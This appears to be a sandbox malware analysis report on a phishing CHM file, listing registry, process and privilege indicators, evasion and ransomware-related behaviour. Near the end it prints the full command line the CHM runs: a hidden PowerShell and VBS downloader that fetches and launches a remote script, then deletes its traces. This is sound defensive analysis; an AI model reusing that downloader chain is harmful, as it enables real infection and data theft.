Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	TieringEngineService.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	TieringEngineService.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2124	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9938 = "3GPP2 Audio/Video"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-121 = "Microsoft Word 97 - 2003 Template"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-120 = "Microsoft Word 97 - 2003 Document"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	SearchFilterHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{487BA7B8-4DB0-465F-B122-C74A445A095D} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000275c861c2a6bdb01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{97E467B4-98C6-4F19-9588-161B7773D6F6} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000002171b51a2a6bdb01	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{01BE4CFB-129A-452B-A209-F9D40B3B84A5} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000e8bee21a2a6bdb01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-182 = "Microsoft PowerPoint Template"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\cabview.dll,-20 = "Cabinet File"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-12385 = "Favorites Bar"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{AEB16279-B750-48F1-8586-97956060175A} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000002de8ab1a2a6bdb01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\msinfo32.exe,-10001 = "System Information File"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1130 = "Microsoft Modem Device Provider"	fxssvc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\notepad.exe,-469 = "Text Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1134 = "Microsoft Routing Extension"	fxssvc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-10046 = "Internet Shortcut"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2FB4720-F45F-4A3C-8CB2-2060E12425C3} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000a148731c2a6bdb01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Common Files\system\wab32res.dll,-10100 = "Contacts"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-116 = "Microsoft Excel Template"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-123 = "Microsoft Word Document"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{C120DE80-FDE4-49F5-A713-E902EF062B8A} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000003d084e1b2a6bdb01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-184 = "Microsoft PowerPoint Macro-Enabled Design Template"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\acppage.dll,-6005 = "Shortcut to MS-DOS Program"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9937 = "3GPP Audio/Video"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-172 = "Microsoft PowerPoint 97-2003 Slide Show"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-912 = "HTML Document"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\MPEG2Demultiplexer	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Multimedia\ActiveMovie	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-131 = "Rich Text Format"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9912 = "Windows Media Audio file"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9905 = "Video Clip"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1133 = "Print"	fxssvc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-21825 = "3D Objects"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-194 = "Microsoft Excel Add-In"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9902 = "Movie Clip"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-24585 = "Cascading Style Sheet Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-140 = "Microsoft OneNote Section"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9907 = "MIDI Sequence"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-21824 = "Camera Roll"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\Windows.UI.Immersive.dll,-38304 = "Public Account Pictures"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{A38B883C-1682-497E-97B0-0A3A9E801682} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000006311751a2a6bdb01	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{33154C99-BF49-443D-A73C-303A23ABBE97} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000320a101b2a6bdb01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-101 = "Microsoft Excel Worksheet"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-114 = "OpenDocument Spreadsheet"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-142 = "Microsoft OneNote Table Of Contents"	SearchProtocolHost.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	30	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	34	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4360	powershell.exe
4360	powershell.exe
2052	powershell.exe
2052	powershell.exe
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4076	aken.pif
4956	svchost.pif
4956	svchost.pif
4076	aken.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif
4956	svchost.pif

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
652	Process not Found
652	Process not Found
652	Process not Found

Suspicious use of AdjustPrivilegeToken 47 IoCs

description	pid	Process
Token: SeDebugPrivilege	4360	powershell.exe
Token: SeDebugPrivilege	2052	powershell.exe
Token: SeDebugPrivilege	2124	taskkill.exe
Token: SeDebugPrivilege	4076	aken.pif
Token: SeTakeOwnershipPrivilege	2720	ezaitqoJ.pif
Token: SeDebugPrivilege	2720	ezaitqoJ.pif
Token: SeAuditPrivilege	5628	fxssvc.exe
Token: SeRestorePrivilege	2288	TieringEngineService.exe
Token: SeManageVolumePrivilege	2288	TieringEngineService.exe
Token: SeAssignPrimaryTokenPrivilege	4552	AgentService.exe
Token: SeBackupPrivilege	5024	vssvc.exe
Token: SeRestorePrivilege	5024	vssvc.exe
Token: SeAuditPrivilege	5024	vssvc.exe
Token: SeBackupPrivilege	916	wbengine.exe
Token: SeRestorePrivilege	916	wbengine.exe
Token: SeSecurityPrivilege	916	wbengine.exe
Token: 33	64	SearchIndexer.exe
Token: SeIncBasePriorityPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	64	SearchIndexer.exe
Token: SeDebugPrivilege	2720	ezaitqoJ.pif
Token: SeDebugPrivilege	2720	ezaitqoJ.pif
Token: SeDebugPrivilege	2720	ezaitqoJ.pif
Token: SeDebugPrivilege	2720	ezaitqoJ.pif
Token: SeDebugPrivilege	2720	ezaitqoJ.pif

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3512	hh.exe
3512	hh.exe

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 3512 wrote to memory of 4572	3512	hh.exe	82
PID 3512 wrote to memory of 4572	3512	hh.exe	82
PID 4572 wrote to memory of 2712	4572	cmd.exe	84
PID 4572 wrote to memory of 2712	4572	cmd.exe	84
PID 4572 wrote to memory of 4360	4572	cmd.exe	85
PID 4572 wrote to memory of 4360	4572	cmd.exe	85
PID 4360 wrote to memory of 1380	4360	powershell.exe	86
PID 4360 wrote to memory of 1380	4360	powershell.exe	86
PID 4572 wrote to memory of 2052	4572	cmd.exe	89
PID 4572 wrote to memory of 2052	4572	cmd.exe	89
PID 2052 wrote to memory of 4936	2052	powershell.exe	90
PID 2052 wrote to memory of 4936	2052	powershell.exe	90
PID 4572 wrote to memory of 2124	4572	cmd.exe	92
PID 4572 wrote to memory of 2124	4572	cmd.exe	92
PID 4936 wrote to memory of 3828	4936	cmd.exe	95
PID 4936 wrote to memory of 3828	4936	cmd.exe	95
PID 4936 wrote to memory of 2436	4936	cmd.exe	96
PID 4936 wrote to memory of 2436	4936	cmd.exe	96
PID 4936 wrote to memory of 2436	4936	cmd.exe	96
PID 2436 wrote to memory of 2712	2436	x.exe	100
PID 2436 wrote to memory of 2712	2436	x.exe	100
PID 2436 wrote to memory of 2712	2436	x.exe	100
PID 2436 wrote to memory of 4680	2436	x.exe	102
PID 2436 wrote to memory of 4680	2436	x.exe	102
PID 2436 wrote to memory of 4680	2436	x.exe	102
PID 4680 wrote to memory of 4956	4680	cmd.exe	105
PID 4680 wrote to memory of 4956	4680	cmd.exe	105
PID 4956 wrote to memory of 3000	4956	svchost.pif	106
PID 4956 wrote to memory of 3000	4956	svchost.pif	106
PID 3000 wrote to memory of 2320	3000	cmd.exe	108
PID 3000 wrote to memory of 2320	3000	cmd.exe	108
PID 3000 wrote to memory of 4784	3000	cmd.exe	109
PID 3000 wrote to memory of 4784	3000	cmd.exe	109
PID 3000 wrote to memory of 544	3000	cmd.exe	110
PID 3000 wrote to memory of 544	3000	cmd.exe	110
PID 3000 wrote to memory of 1456	3000	cmd.exe	111
PID 3000 wrote to memory of 1456	3000	cmd.exe	111
PID 1456 wrote to memory of 3820	1456	alpha.pif	112
PID 1456 wrote to memory of 3820	1456	alpha.pif	112
PID 3000 wrote to memory of 5036	3000	cmd.exe	113
PID 3000 wrote to memory of 5036	3000	cmd.exe	113
PID 5036 wrote to memory of 2920	5036	alpha.pif	114
PID 5036 wrote to memory of 2920	5036	alpha.pif	114
PID 3000 wrote to memory of 3032	3000	cmd.exe	115
PID 3000 wrote to memory of 3032	3000	cmd.exe	115
PID 3032 wrote to memory of 4076	3032	alpha.pif	116
PID 3032 wrote to memory of 4076	3032	alpha.pif	116
PID 2436 wrote to memory of 2720	2436	x.exe	118
PID 2436 wrote to memory of 2720	2436	x.exe	118
PID 2436 wrote to memory of 2720	2436	x.exe	118
PID 2436 wrote to memory of 2720	2436	x.exe	118
PID 2436 wrote to memory of 2720	2436	x.exe	118
PID 64 wrote to memory of 5496	64	SearchIndexer.exe	145
PID 64 wrote to memory of 5496	64	SearchIndexer.exe	145
PID 64 wrote to memory of 5688	64	SearchIndexer.exe	146
PID 64 wrote to memory of 5688	64	SearchIndexer.exe	146

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	ezaitqoJ.pif

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	ezaitqoJ.pif

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\PO_095709_0485685_MQ1940_Order_Specifications.chm
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3512
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/key/PO.CMD C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
  2⤵
  - Hide Artifacts: Hidden Window
  - Suspicious use of WriteProcessMemory
  PID:4572
- - C:\Windows\system32\extrac32.exe
    extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe
    3⤵
    PID:2712
